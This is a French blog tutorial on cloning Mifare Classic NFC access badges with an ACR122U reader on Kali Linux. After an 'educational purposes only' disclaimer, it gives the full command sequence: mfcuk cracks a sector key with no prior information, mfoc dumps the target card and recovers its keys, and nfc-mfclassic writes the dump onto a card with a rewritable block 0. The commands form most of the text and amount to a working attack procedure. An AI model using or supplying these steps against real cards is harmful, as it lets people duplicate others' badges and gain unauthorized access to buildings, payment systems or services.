Technique de clonage des tags NFC de la gamme Mifare

Tutoriel sur le clonage des tags et des cartes à puce de la technologie NFC - gamme Mifare en utilisant un lecteur de carte/badge NFC/RFC de référence ACR122U

Publié le 19-01-2021 12:07:18

AVERTISSEMENT : Toutes les informations fournies dans cette publication le sont à des fins éducatives uniquement. Le site n'est en aucun cas responsable de toute utilisation abusive de ces informations. Vous êtes seul responsable de vos actes devant la loi.
L’article 323-1 du code pénal sanctionne le piratage frauduleux d’au moins deux ans d’emprisonnement et de 60 000 euros d’amende.

Matériel nécessaire pour effectuer un clonage de tag NFC Mifare

OS Kali
les logiciels mfuck, mfoc,nfc, nfc-mfclassic
Lecteur NFC/RFID supportant le standard de la norme ISO 14443 cartes de Type A et B , Mifare, FeliCa, et les 4 types de tags NFC (ISO/IEC 18092) (voir ACR122U)
Tag RFID avec un bloc 0 réinscriptible (voir NFC S50 ISO14443A)
Tag RFID cible

Une fois l'OS installée et lancée, et le lecteur branché :

Ouvrir une nouvelle console / prompt :

Mise à jour des composants logiciels pour réaliser le clonage d'un tag NFC MIFARE :

Nous débutons par vérifier nos versions des logiciels mfcuk et mfoc et réaliser les installations ou les mises à jours.

apt-get install mfcuk mfoc
apt-get update mfcuk mfoc

mfcuk : sert à trouver la clé d'un secteur en plusieurs minutes sans avoir besoin d'aucune information initiale sur le tag NFC MIFARE.

mfoc : sert pour trouver très rapidemment l'ensemble des clés sur le tag NFC MIFARE. En ne connaissant qu'une ou que quelques unes des clés (découvertes au préalable avec mfcuk).

nfc-mfclassic : sert pour réaliser le clonnage d'un tag NFC MIFARE vers un autre.

Pour décharger les modules pouvant perturber le clonage (optionel) (documentation modprobe)

modprobe -r pn533_usb
modprobe -r pn533

Pour contrôler que nos deux cartes sont bien lisibles (action à effectuer sur les deux badges):

nfc-list

La console vous renvera les informations sur le badge (en cas d'erreur, vérifier votre saisie, si celle ci perciste le badge n'est probablement pas compatible avec votre lecteur)

Protocole de clonage d'un tag NFC MIFARE :

Pour copier (sur le disque) le contenu de la carte NFC MIFARE cible :

mfoc -P 500 -O dump_card_target.dmp

Pour copier (sur le disque) le contenu de la carte vierge réinscriptible NFC MIFARE :

mfoc -P 500 -O dump_card_rewritable.dmp

Pour trouver une clé d'un secteur sans information à l'aide de MFCUK (clé A du secteur 0) :

mfcuk -C -R 0:A

Pour cloner le contenu de la carte cible vers la carte réinscriptible :

nfc-mfclassic W a dump_card_target.dmp dump_card_rewritable.dmp

A noter qu'en fonction de votre CPU, et de la carte ces opérations pour cloner le tag NFC MIFARE peuvent être plus ou moins gourmandes en terme de temps.